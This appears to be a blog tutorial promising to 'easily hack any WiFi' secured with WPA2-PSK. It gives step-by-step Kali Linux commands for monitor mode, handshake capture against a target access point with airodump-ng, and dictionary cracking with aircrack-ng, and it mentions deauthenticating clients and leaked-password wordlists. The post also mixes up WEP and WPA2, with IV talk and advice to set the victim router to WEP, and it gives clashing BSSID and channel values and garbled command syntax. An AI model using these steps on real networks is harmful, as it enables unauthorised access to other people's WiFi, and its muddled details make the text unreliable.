Hack WiFi With Encryption WPA2-PSK Using Kali Linux
Jo
The BreakingWPA2-01.cap file was created when we ran the airodump-ng command. The valid WPA2 handshake airodump captured is stored in a .cap file named as BreakingWPA2-01
Today I am going to teach you a trick with help of which you
can easily hack any WiFi with encryption WPA2-PSK using Kali Linux . This
process is just a manipulation of some commands using Kali Linux terminal.
First what is Wifi (WPA2-PSK) & (WEP)
- WPA means Wi-Fi Protected Access
- WEP means Wired Equivalent Privacy
Procedure :-
Step 1:-
The very first step is to verify the router configuration.
Normally in a real penetration test we don’t have this option, but since I am
using a home laboratory I have a little more flexibility.
In my case the Laboratory access point is secured with
WPA2-PSK. It’s passphrase is kept as Cisco123 . You can use any kind of
wireless router to make your wireless laboratory.
Use an old router and open it’s setting set it up as WEP for
wireless security to use as a victim router. Connect one other PC , tablet , or
smartphone to it wirelessly since the encrypted data between the two will need
to be sniffed .
The main purpose of this attack is to capture as much
traffic as possible using a tool called “airodump-ng”. Each data packet has an
associated three byte Initialization Vector called IV’s. Whenever the attack is
launched our goal is to get as many encrypted data packets or IV’s as possible
then use aircrack-ng on the captured file and find out the password.
Step 2:-
The iwconfig command helps us to show the wireless cards
attached to the system. Currently I am using a RealTek wireless card. Linux ships with
the RealTek drivers, making it a Linux plug and play wireless card.
The
operating system recognizes a wireless interface named wlan0.
Step 3:-
My next step is going to be enable the wireless interface.
This is done by entering the ifconfig wlan0 up command.
Step 4:-
I need to check which wireless networks my wireless card
scans . I will issue the iwlist wlan0 scanning command.
This command forces the wireless card to scan and report on
all wireless networks available in nearby .
You can see in my example I have
found my target network which is going to be Wireless Lab. It had also found
the MAC address of my access point which is 0E:18:1A:36:D6:22. Take a note of this
as this is important because I want to limit my attack to this specific access
point .
Secondly, we see the AP is transmitting on channel 36 . This is
important because it helps us to be specific on what wireless channel we want
our wireless card to monitor and capture traffic from.
Step 5:-
Our next step is to shift the wireless card to monitoring
mode. After doing this your wireless card will be able to examine all the
packets in the air.
Monitor interface is created using airmon-ng. Enter the
airmon-ng command to verify airmon-ng sees your wireless card. At that point
make the monitor interface by entering the command: airmon-ng start wlan0
Next, run the ifconfig command to check that the monitor
interface is created or not . We can see mon0 is created.
Now verify the interface mon0 has been created.
Step 6:-
Using airodump-ng we have to capture the WPA2 handshake. The
hacker will have to catch someone while authenticating to get a valid capture. Airodump-ng
will display a proper handshake when it captures it. This will display the
handshake confirmation in the upper right hand corner of the screen.
Note:-
We will have to get manually connected to the wireless
network to force a handshake. In an upcoming future post I will show you how to
force a reauthorization to make a device automatically disconnect and reconnect
without any manual intervention.
We used the following command: airodump-ng mon0 – -bssid
20:aa:4b:1f:b0:10 (to capture packets from our AP) – –channel 6 (to limit
channel hopping) – –write BreakingWPA2 (the name of the file we will save to)
airodump-ng mon0 – -bssid 0E:18:1A:36:D6:22 – –channel 36 –
–write BreakingWPA2
(make sure there is no space between “- -“)
To capture the handshake you need to monitor a client to get
legitimately authenticate to the network. However, it is not necessary to wait
for a client to legitimately authenticate. You can also force a client to
re-authenticate (For this you will have to force a client for deauthorization).
When you see the WPA Handshake Command you should consider
that you have captured the valid handshake
Example:-
Step 7:-
We are going to use aircrack-ng with the dictionary file to
crack the password. Your probability of breaking the password depends on the
password file.
The command on is: aircrack-ng “name of cap file you
created” -w “name of your dictionary file”
The BreakingWPA2-01.cap file was created when we ran the airodump-ng command. The valid WPA2 handshake airodump captured is stored in a .cap file named as BreakingWPA2-01
Backtrack 5 comes with a basic dictionary. The dictionary
file darkc0de.lst is a popular wordlist that comes with BackTrack5 . I have
added my password Cisco123 in this file to make the test run a little smoother
Many attackers use
large dictionaries that increase their chances of cracking the password. Many
dictionaries contain passwords from real users and websites that have been cracked
and posted on the Internet. Some sophisticated dictionaries combine multiple
languages, permutations of each word, and key words and phrases from social
media sites such as Twitter and Facebook
Kali does not come with the dictionary darkc0de.lst but if
you need it you can download it from here
NOTE:-
Kali does have built-in worldlists in:
/usr/share/worldlist
In this tutorial I have created a file named “sample.lst”
and added the word Cisco123 in it.
Success:
If the password is available in the dictionary file then
Aircrack-ng will crack it.
Comments
Post a Comment